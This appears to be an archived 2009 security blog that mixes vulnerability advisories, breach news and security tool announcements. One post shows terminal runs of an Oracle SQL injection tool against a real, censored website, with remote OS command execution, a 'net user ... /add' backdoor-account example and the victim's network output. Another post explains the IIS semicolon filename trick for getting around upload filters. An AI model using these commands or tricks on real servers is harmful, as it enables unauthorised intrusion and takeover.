Friday, December 25, 2009

TLS Renegotiation Vulnerability-Proof of Concept Code

Information about a vulnerability in the TLS protocol was published in the beginning of November 2009. Attackers can take advantage of that vulnerability to inject arbitrary prefixes into a network connection protected by TLS. This can result in severe vulnerabilities, depending on the application layer protocol used over TLS.

RedTeam Pentesting used the External linkPython module External linkTLS Lite to develop proof of concept code that exploits this vulnerability. It is published here to raise awareness for the vulnerability and its potential impact. Furthermore, it shall give interested persons the opportunity to analyse applications employing TLS for further vulnerabilities.

For information details, here.

For POC Exploit, please click here.

Thursday, December 24, 2009

Microsoft IIS File Parsing Extension Vulnerability

A vulnerability has been identified in Microsoft Internet Information Services (IIS) where the server in incorrectly handling files with multiple extensions separated by the ";" character such as "malicious.asp;.jpg" as an ASP file. This could allow attackers to upload malicious executables on a vulnerable web server, bypassing file extension protections and restrictions. This vulnerability does not work with ASP.Net.

Finding Date: April 2008
Report Date: Dec. 2009
Found by: Soroush Dalili (Irsdl {4t] yahoo [d0t} com)
Website: Soroush.SecProject.com
Weblog: Soroush.SecProject.com/blog/
Thanks From: Mr. Ali Abbas Nejad, Mormoroth, Aria‐Security Team, and other ethical hackers.

Vulnerability/Risk Description:
IIS can execute any extension as an Active Server Page or any other executable extension. For instance “malicious.asp;.jpg” is executed as an ASP file on the server. Many file uploaders protect the system by checking only the last section of the filename as its extension. And by using this vulnerability, an attacker can bypass this protection and upload a dangerous executable file on the server.

Impact Description:
Impact of this vulnerability is absolutely high as an attacker can bypass file extension protections by using a semi‐colon after an executable extension such as “.asp”, “.cer”, “.asa”, and so on.Many web applications are vulnerable against file uploading attacks because of this weakness of IIS. In a measurement which was performed in summer 2008 on some of the famous web applications, 70 percent of the secure file uploaders were bypassed by using this vulnerability.

Method of Finding:
Simple fuzzer by using ASP language itself.

More Details:
In case of having the “malicious.asp;.jpg”, web applications consider it as a JPEG file and IIS consider it as an ASP file and pass it to “asp.dll”. This bug does not work with ASP.Net as the .Net technology cannot recognize “malicious.aspx;.jpg” as a .Net file and shows a “page not found” error.
Besides using semi‐colon, “:” can be used to make an empty file with any arbitrary extension. For example by uploading “test.asp:.jpg”, an empty ASP file ‐ “test.asp” ‐ would be created on the server on an NTFS partition. This is only because of “NTFS Alternate Data Streams” and it is completely different from the semi‐colon vulnerability.


More details about this vulnerability here.

DDoS attack scrooges Amazon and others

Service to Amazon, Wal-Mart and several other shopping sites was briefly blocked on Wednesday evening when their DNS provider was hit by a distributed denial of service (DDoS) attack.

Neustar, which provides DNS services to high profile website addresses under the UltraDNS brand, said the flood of malicious traffic, just two days before Christmas, was directed at the company's facilities in San Jose and Palo Alto, and that the effects were mostly limited to California users.

The websites were only down for about an hour — but needless to say at a very inopportune time for some. Neustar said that it first detected the trouble around 4:45 p.m. Pacific Time (12:45 AM Thursday, GMT).

Folks attempting last-minute shopping at Amazon, Wal-Mart, the Gap, and the travel site Expedia were ankled by outages and slow web browsing as a result of the DDoS attack. Other websites impacted include Salesforce.com and Linden Labs (maker of the game Second Life). In a message posted on Twitter, Jeff Barr of Amazon Web Services wrote that the retailer's outages were mostly in the US West Coast, and took down S3 and EC2 — as well as Amazon.com in "many places."

"We analyzed the patterns and were able to put mitigation measures in place within minutes of identifying the attack," NeuStar said in an emailed statement. "We had everything under control in well under an hour. The attack was limited to Northern California internet users. All along the way we were proactively communicating to our customers to let them know exactly what was happening and the steps we were taking."

This isn't the first time UltraDNS and its clients have been downed by DDoS attacks. In April, a larger DDoS attack took Amazon, SalesForce, Oracle and Juniper offline for several hours. Although more limited, Wednesday's malicious torrent of web traffic will insure that someone gets coal in their stocking. ®

This article is taken from http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/

Sunday, December 20, 2009

Twitter investigates DNS hijack

Twitter, the popular micro-blogging network, welcomed visitors on Thursday night with a page claiming that the site had been hacked by a defacers with links to Iran.

In reality, the company's domain name had been hijacked by the vandals and visitors redirected to an unrelated site hosting the page. Passive domain-name service (DNS) records showed the DNS poisoning, as Twitter's record pointed first to two domains registered in Moldova and then to a domain registered to an undisclosed person in Pompano Beach, Florida, according to information posted by the SANS Internet Storm Center.

Twitter acknowledged the issue late last night, following earlier media reports.

"Twitter’s DNS records were temporarily compromised but have now been fixed," the site administrators' wrote at 11:28 p.m. PT. "We are looking into the underlying cause and will update with more information soon."

The popularity of the social networking service has made it a target of hackers and a focus of security researchers this year. In August, a botnet targeted both Twitter and Facebook with a distributed denial-of-service attack. The micro-blogging service has also had to contend with the spreading of worms, the exploitation of a security vulnerability, and the use of its network as a command-and-control channel.

Thursday's defacement claimed to be done by the "Iranian Cyber Army," but another message -- translated from Farsi by Google's automated translation engine -- reportedly claimed the attack was motivated by the U.S. and Twitter's interference in "my country," suggesting the attacker was an individual.

From: SecurityFocus

Friday, December 04, 2009

Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus

This subject has been covered before, but why not once more? Metasploit 3.3 adds some new options, and better Windows support. As stated in the title, this video will cover using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus. I will also talk a little about using CWSandbox and VirusTotal to examine malware.

If you find this video useful, consider going to the Metasploit Unleashed page and donating to the Hackers For Charity Kenya food for work program, or come to the IndySec charity event.

By the way, I've put out two versions of this video, one an SWF and the other a streaming video. Please let me know which you prefer.

To see this video, please refer to this link:
http://www.irongeek.com/i.php?page=videos%2Fmsfpayload-msfencoder-metasploit-3-3

GreenSQL- Free database firewall protects PostgreSQL and MySQL

GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy for SQL commands and has built in support for MySQL & PostgreSQL . The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc). GreenSQL is distributed under the GPL license.

You can download it here

GreenSQL works as a reverse proxy for MySQL connections. This means, that instead of connecting TO THE MySQL server, your applications will connect to THE GreenSQL server. GreenSQL will analyze SQL queries and then, if they're safe, will forward them to the back-end MySQL server.

The following picture describes the whole process:


As you can see, GreenSQL calls the real database server to execute SQL commands and the web application connects to the GreenSQL server as if it were a real database server.

GreenSQL can be installed together with the database server on the same computer or it can use a distinct server. By default GreenSQL listens on local port 127.0.0.1:3305 redirecting SQL requests to 127.0.0.1:3306 (the default MySQL setting). These settings can be altered using the GreenSQL Console.

For more details, please refer to GreenSQL website:
http://www.greensql.net/about

FreeBSD 8.0/7.1 local root issue

There is a new local root bug in FreeBSD.This bug discovered & exploited by Nikolaos Rangos also known as KingcopeThere is an unbelievable simple local r00t bug in recent FreeBSD versions.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like
LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.

Please read this advisory for more details:
http://securityreason.com/securityalert/6799

Tuesday, December 01, 2009

FreeBSD 8.0-RELEASE

The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 8.0-RELEASE. This release starts off the new 8-STABLE branch which improves on the functionality of FreeBSD 7.X and introduces many new features. Some of the highlights:
-Xen Dom-U, VirtualBox guest and host, hierarchical jails.
-NFSv3 GSSAPI support, experimental NFSv4 client and server.
-802.11s D3.03 wireless mesh networking and Virtual Access Point support.
-ZFS is no longer in experimental status.
-Ground-up rewrite of USB, including USB target support.
-Continued SMP scalability improvements in many areas, especially VFS.
-Revised network link layer subsystem.
-Experimental MIPS architecture support.

Please read here for more details:
http://www.freebsd.org/releases/8.0R/announce.html

Sunday, November 29, 2009

Multi Purpose Oracle SQL Injection Tool with darkORASQLi.py

After successfully developed POSTGRESQL injection tool,darkc0de will release new tool for Oracle SQL injection. If you ever heard about darkMYSQLi, darkMSSQLi, or darkPGSQLi, i think this tool is useful for you all especially penetration testers or security consultants. This tool 80% working and will be released later.


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"




--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux

[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log




--cmd "/sbin/ifconfig"


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)

[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, keep r0x darkc0de!

Strong Password

To protect your computer, your data and your online accounts, you should have a strong password. If your password is weak, you make it easier for someone to break in. Hackers make their livelihood by automating ways to continually search out the weakest link to gain access to a network or computer.

Please read this link for Password Security Awareness:
http://www.microsoft.com/protect/fraud/passwords/create.aspx


http://www.utexas.edu/its/secure/articles/keep_safe_with_strong_passwords.php



To check the strength of your password, you can use Password Checker:
http://www.microsoft.com/protect/fraud/passwords/checker.aspx

Symantec Online Store Hacked

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script from the pcd.symantec.com website, allows for a blind SQL injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

During a regular SQLi attack, the result of a rogue SQL query is displayed inside the browser instead of the normal web page output. Meanwhile, in a blind SQL injection, the query executes, but the website continues to display normally, making it much more difficult to extract information.

Please read here for more details:
http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml

Friday, November 13, 2009

Opinion: Can the SSL vulnerability hurt you?

ComputerWorld Security:

The security blogosphere is agog over some recently published vulnerability information describing attacks against the venerable SSL protocol -- you know, the one that almost the entire Internet relies on for securing transactions as they transit the Net. But how does this impact you? Let's try to separate the wheat from the chaff.

Let's start by looking at the vulnerability itself. It is a "man-in-the-middle" (MitM) attack in which an attacker can use an SSL feature called "negotiation" to inject bad stuff into an SSL session. Right, so that's not good news. But the sky isn't exactly falling yet, so we can all remain calm for now. Let's put things into perspective here.

Yes, by all accounts, there seems to be a serious weakness in SSL. As of right now, however, that weakness is known to a relatively small collection of folks who are working to come up with some solutions to the problem. That said, the technical details of the problem have been published, and there's little doubt that attacks will begin to surface over time.

More info, please read here.

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
See: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

Saturday, November 07, 2009

Facebook and Myspace bolt Flash backdoors

Web developer Yvo Schaap has discovered that Facebook and Myspace have been being overgenerous in assigning privileges for Flash applications, allowing Schaap's Flash application to access another user's entire Facebook data.

Flash applications are only normally able to access resources on the server from which they have been loaded. In order to allow developers to design applications with more flexibility, Abode has, however, introduced the option of explicitly granting access to other servers. This is achieved by means of the crossdomain.xml file in a web server's root folder. Facebook had used this to grant the right to access the main domain to trusted sites via instructions such as:

More information:
http://www.h-online.com/security/news/item/Facebook-and-Myspace-bolt-Flash-backdoors-852318.html

Saturday, October 31, 2009

Wapiti -Web application vulnerability scanner

Wapiti allows you to audit the security of your web applications.
It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data.
Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.

Wapiti can detect the following vulnerabilities :

* File Handling Errors (Local and remote include/require, fopen, readfile...)
* Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
* XSS (Cross Site Scripting) Injection
* LDAP Injection
* Command Execution detection (eval(), system(), passtru()...)
* CRLF Injection (HTTP Response Splitting, session fixation...)

Wapiti is able to differentiate ponctual and permanent XSS vulnerabilities.
Wapiti prints a warning everytime it founds a script allowing HTTP uploads.
A warning is also issued when a HTTP 500 code is returned (useful for ASP/IIS)
Wapiti does not rely on a vulnerability database like Nikto do. Wapiti aims to discover unknown vulnerabilities in web applications.
It does not provide a GUI for the moment and you must use it from a terminal.

You can download here:
http://sourceforge.net/projects/wapiti/

Small, medium firms cut security budgets

Small and medium businesses have, for the most part, frozen spending on security, despite an increase in perceived threats, according to a survey released this week by security firm McAfee.

The report, McAfee's first study of the small- and medium-sized business market, analyzes surveys from approximately 100 companies in each of nine different countries, focusing on firms with 51 to 1,000 employees. The surveys found that three-quarters of firms decided to cut or freeze their spending on information security in 2009, and two-thirds of companies spent less than three hours a week on security.

Read more at SecurityFocus

Saturday, October 24, 2009

FTK 3.0 Forensic Toolkit

FTK 3.0 delivers on a number of advanced capabilities, including greatly enhanced analytics, remote device acquisition and expanded reporting options. GUI speeds and processing time have also been dramatically improved.

Reengineered for Improved Performance:
* UI Performance: The FTK GUI is 10 times more responsive across the board, even on machines with only 4GB of RAM.
* Indexing: Indexes quickly and search results populate fast, even with large result sets.
* Distributed Processing: Every copy of FTK 3 comes with 4 workers, allowing you to leverage CPU resources from up to 4 computers (3 distributed workers and 1 worker on the main FTK examiner system).

Compelling New Capabilities:
* RAM Analysis: Enumerate all running processes from 32-bit machines, search memory strings, and process RAM captures for passwords, html pages, lnk files and MS Office documents.
* Mac Analysis: Many new capabilities, such as processing B-Trees attributes for metadata, decrypting Sparse Images or Sparse Bundles, PLIST support, SQLite support and more.
* Pornographic Image Identification: Enables the automated detection and identification of pornographic images by analyzing visual features in the image to assess its actual visual content.

Friday, October 09, 2009

Installing httpry in Backtrack 4

httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.

What can you do with it? Here's a few ideas:
* See what users on your network are requesting online
* Check for proper server configuration (or improper, as the case may be)
* Research patterns in HTTP usage
* Watch for dangerous downloaded files
* Verify the enforcement of HTTP policy on your network
* Extract HTTP statistics out of saved capture files
* It's just plain fun to watch in realtime


Download httpry from this site:
root@zaha-desktop:~# wget http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz
--2009-10-09 22:45:48-- http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz
Resolving dumpsterventures.com... 198.107.5.17
Connecting to dumpsterventures.com|198.107.5.17|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44995 (44K) [application/x-tgz]
Saving to: `httpry-0.1.5.tar.gz'

100%[===================================================>] 44,995 39.3K/s in 1.1s

2009-10-09 22:45:50 (39.3 KB/s) - `httpry-0.1.5.tar.gz' saved [44995/44995]



After you download, you extract it:
root@zaha-desktop:~#
root@zaha-desktop:~# tar -xzvf httpry-0.1.5.tar.gz
httpry-0.1.5/
httpry-0.1.5/format.h
httpry-0.1.5/format.c
httpry-0.1.5/error.h
httpry-0.1.5/utility.c
httpry-0.1.5/Makefile
httpry-0.1.5/build/
httpry-0.1.5/build/httpry.spec
httpry-0.1.5/scripts/
httpry-0.1.5/scripts/parse_log.pl
httpry-0.1.5/scripts/perl-tools
httpry-0.1.5/scripts/plugins/
httpry-0.1.5/scripts/plugins/db_dump.mysql
httpry-0.1.5/scripts/plugins/find_proxies.pm
httpry-0.1.5/scripts/plugins/db_dump.cfg
httpry-0.1.5/scripts/plugins/content_analysis.pm
httpry-0.1.5/scripts/plugins/hostnames.pm
httpry-0.1.5/scripts/plugins/tokenize.pm
httpry-0.1.5/scripts/plugins/search_terms.pm
httpry-0.1.5/scripts/plugins/find_proxies.cfg
httpry-0.1.5/scripts/plugins/log_summary.pm
httpry-0.1.5/scripts/plugins/xml_output.css
httpry-0.1.5/scripts/plugins/hostnames.cfg
httpry-0.1.5/scripts/plugins/xml_output.pm
httpry-0.1.5/scripts/plugins/common_log.pm
httpry-0.1.5/scripts/plugins/xml_output.cfg
httpry-0.1.5/scripts/plugins/db_dump.pm
httpry-0.1.5/scripts/plugins/content_analysis.cfg
httpry-0.1.5/scripts/plugins/tokenize.cfg
httpry-0.1.5/scripts/plugins/search_terms.cfg
httpry-0.1.5/scripts/plugins/common_log.cfg
httpry-0.1.5/scripts/plugins/sample_plugin.pm
httpry-0.1.5/scripts/plugins/log_summary.cfg
httpry-0.1.5/methods.h
httpry-0.1.5/tcp.h
httpry-0.1.5/doc/
httpry-0.1.5/doc/ChangeLog
httpry-0.1.5/doc/method-string
httpry-0.1.5/doc/README
httpry-0.1.5/doc/COPYING
httpry-0.1.5/doc/format-string
httpry-0.1.5/doc/perl-tools
httpry-0.1.5/httpry.c
httpry-0.1.5/rc.httpry
httpry-0.1.5/README
httpry-0.1.5/httpry.1
httpry-0.1.5/config.h
httpry-0.1.5/utility.h
httpry-0.1.5/methods.c
httpry-0.1.5/test/
httpry-0.1.5/test/callgrind
httpry-0.1.5/test/massif
httpry-0.1.5/test/valgrind
httpry-0.1.5/test/format-names
root@zaha-desktop:~# cd httpry-0.1.5
root@zaha-desktop:~/httpry-0.1.5# ls
build doc format.c httpry.1 Makefile methods.h README tcp.h utility.c
config.h error.h format.h httpry.c methods.c rc.httpry scripts test utility.h
root@zaha-desktop:~/httpry-0.1.5#



After you download, read the manual about installing and using httpry:
root@zaha-desktop:~/httpry-0.1.5# less README
root@zaha-desktop:~/httpry-0.1.5#


After reading documentation, you can install it:
root@zaha-desktop:~/httpry-0.1.5# make
gcc -Wall -O3 -funroll-loops -I/usr/include/pcap -I/usr/local/include/pcap -o httpry httpry.c format.c methods.c utility.c -lpcap
root@zaha-desktop:~/httpry-0.1.5# make install
--------------------------------------------------
Installing httpry into /usr/sbin/
You can move the Perl scripts and other tools to
a location of your choosing manually
--------------------------------------------------
cp -f httpry /usr/sbin/
cp -f httpry.1 /usr/man/man1/ || cp -f httpry.1 /usr/local/man/man1/
root@zaha-desktop:~/httpry-0.1.5#



Running httpry (httpry -h show you how to use it)
root@zaha-desktop:~# httpry -i eth0 -o /home/zahar/zahar.txt
httpry version 0.1.5 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel
Starting capture on eth0 interface
Writing output to file: /home/zahar/zahar.txt
^CCaught SIGINT, shutting down...
216 packets received, 0 packets dropped, 40 http packets parsed
563.5 packets/min, 104.3 http packets/min
root@zaha-desktop:~#



When you open that file, you can see http traffic of website that you have visited:
root@zaha-desktop:~# cd /home/zahar/
root@zaha-desktop:/home/zahar# ls
zahar.txt
root@zaha-desktop:/home/zahar# cat zahar.txt
# httpry version 0.1.5
# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase
2009-10-09 23:07:07 69.63.176.193 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:07 192.168.1.2 69.63.176.193 > GET 0.channel33.facebook.com /x/2319999860/false/p_1560360253=1 HTTP/1.1 --
2009-10-09 23:07:16 192.168.1.2 74.125.153.95 > GET ajax.googleapis.com /ajax/services/search/web?v=1.0&rsz=large&q=http%3A%2F%2Fwww.lifedork.net%2F HTTP/1.1 - -
2009-10-09 23:07:16 74.125.153.95 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:17 192.168.1.2 174.120.81.182 > GET www.lifedork.net / HTTP/1.1 - -
2009-10-09 23:07:17 174.120.81.182 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:18 192.168.1.2 72.21.91.20 > GET resources.infolinks.com /js/infolinks_main.js HTTP/1.1 - -
2009-10-09 23:07:19 72.21.91.20 192.168.1.2 < - - -HTTP/1.1 304 Not Modified
2009-10-09 23:07:19 192.168.1.2 72.14.203.101 > GET www.google-analytics.com /__utm.gif?utmwv=4.5.7&utmn=84770406&utmhn=www.lifedork.net&utmcs=UTF-8&utmsr=1024x768&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.0%20r32&utmdt=Lifedork%20-%20still%20geeX%20%3F%20still%20suX%20!&utmhid=1381620066&utmr=-&utmp=%2F&utmac=UA-2655140-3&utmcc=__utma%3D41342143.642009118.1255096268.1255096268.1255099260.2%3B%2B__utmz%3D41342143.1255096273.1.1.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dusing%2520Backtrack%25204%2520SQL%2520injection%3B HTTP/1.1 - -
2009-10-09 23:07:19 72.14.203.101 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:19 192.168.1.2 76.74.254.120 > GET stats.wordpress.com /g.gif?host=www.lifedork.net&rand=0.41899971236858347&blog=1730697&v=ext&post=0&ref= HTTP/1.1 - -
2009-10-09 23:07:19 192.168.1.2 174.120.81.182 > GET www.lifedork.net /page/2 HTTP/1.1 - -
2009-10-09 23:07:19 192.168.1.2 67.202.0.15 > GET router.infolinks.com /gsd/1255100950684?callback=resourcesCallback&pid=15399&wsid=0&pdom=www.lifedork.net HTTP/1.1 - -
2009-10-09 23:07:19 76.74.254.120 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:20 67.202.0.15 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:20 192.168.1.2 72.21.91.20 > GET resources.infolinks.com /flash/request_manager_i18n.swf HTTP/1.1 - -
2009-10-09 23:07:20 192.168.1.2 58.27.186.106 > GET b.scorecardresearch.com /b?c1=8&c2=6416591&rn=0.4555189644582066&c7=http%3A%2F%2Fwww.lifedork.net%2F&c3=3113409433781933211&c4=&c5=&c6=&c15=&c16=&c8=Lifedork%20-%20still%20geeX%20%3F%20still%20suX%20!&c9=&cv=1.6 HTTP/1.1 - -
2009-10-09 23:07:20 174.120.81.182 192.168.1.2 < - - -HTTP/1.1 200 OK
2009-10-09 23:07:20 58.27.186.106 192.168.1.2 < - - -HTTP/1.1 204 No Content



Im not expert in analysis, hope you all can test this tool.

Thursday, October 08, 2009

Operation Phish Phry hooks 100 in U.S. and Egypt

Computerworld - More than 50 people in Southern California, Las Vegas and Charlotte, N.C., were indicted by a grand jury in Los Angeles for scheming to steal bank account information from thousands of people in the U.S. using phishing techniques.

U.S. authorities today arrested 33 of those named in the indictments and are on the lookout for the other 20.

In addition, authorities in Egypt charged another 47 co-conspirators in connection with the same scheme, bringing the total number of people charged to 100 -- the largest number of defendants ever charged for the same cybercrime, according to the FBI.

The indictments stem from a two-year operation dubbed "Phish Phry," which involved the FBI, the U.S. Attorney's Office, the Electronic Crimes Task Force in Los Angeles and Egyptian law enforcement authorities.

The arrests were announced in Los Angeles by Keith Bolcar, acting assistant director in charge of the FBI in Los Angeles, George Cardona, acting U.S. Attorney in Los Angeles, and Egyptian law enforcement authorities.

The 51-count indictment, which was unsealed today, accused all of the defendants with conspiracy to commit wire fraud and bank fraud. Some of those named were also charged with aggravated identity theft, unauthorized access to protected computers and money laundering.

Phishing is a form of social engineering in which attackers send e-mails made to look like legitimate correspondence from reputable institutions such as banks. Victims are directed to Web sites that look authentic but are actually fakes. Once there, they are asked to enter information that can later be used to break into accounts or to commit identity theft.

According to the indictment, hackers in Egypt used phishing techniques to obtain bank account numbers and related personal data from thousands of bank customers in the U.S. The information was then used to break into customer accounts at two U.S. banks, Bank of America and Wells Fargo.

The Egyptian hackers then recruited individuals in the U.S. to help transfer funds from the compromised accounts to newly created accounts. The U.S. part of the crime ring was allegedly managed by Kenneth Lucas, Nichole Merzi and Jonathan Clark, all of whom are residents of California, the FBI said in statement.

The three individuals are alleged to have directed associates to recruit "runners" to establish bank accounts to which funds stolen from the compromised accounts could be transferred. A portion of the funds was wired to the conspirators in Egypt.

The alleged conspirators typically withdrew amounts ranging from a few hundred dollars to more than $2,000 from compromised bank accounts and then transferred the money into the new accounts.

"The sophistication with which Phish Phry defendants operated represents an evolving and troubling paradigm in the way identity theft is now committed," Bolcar said in a statement. The operations of the group had a significant impact on the operations of two banks and caused "huge headaches" for the victims, the statement added.

All of the individuals charged in the U.S face prison terms of up to 20 years if they are convicted.

John Harrison, a group product manager for security vendor Symantec Corp. said the arrests highlight the truly global nature of phishing operations. Despite heightened awareness of the problem, phishing schemes continue to thrive on the Internet, he said.

Last year, Symantec counted more than 55,000 phishing sites. That figure represented an increase of more than 60% from 2007 levels, Harrison said. The growing availability of sophisticated phishing tool kits is adding to the problem by making it much simpler for would-be phishers to create spoofed Web sites that can be used to trick victims into parting with confidential information, he said.

Static Binary Analysis of Recent SMBv2 Vulnerability

The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer's Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.

Details:http://www.secureworks.com/research/threats/windows-0day/?threat=windows-0day

Sunday, October 04, 2009

File Carving and File Recovery with DiskDigger

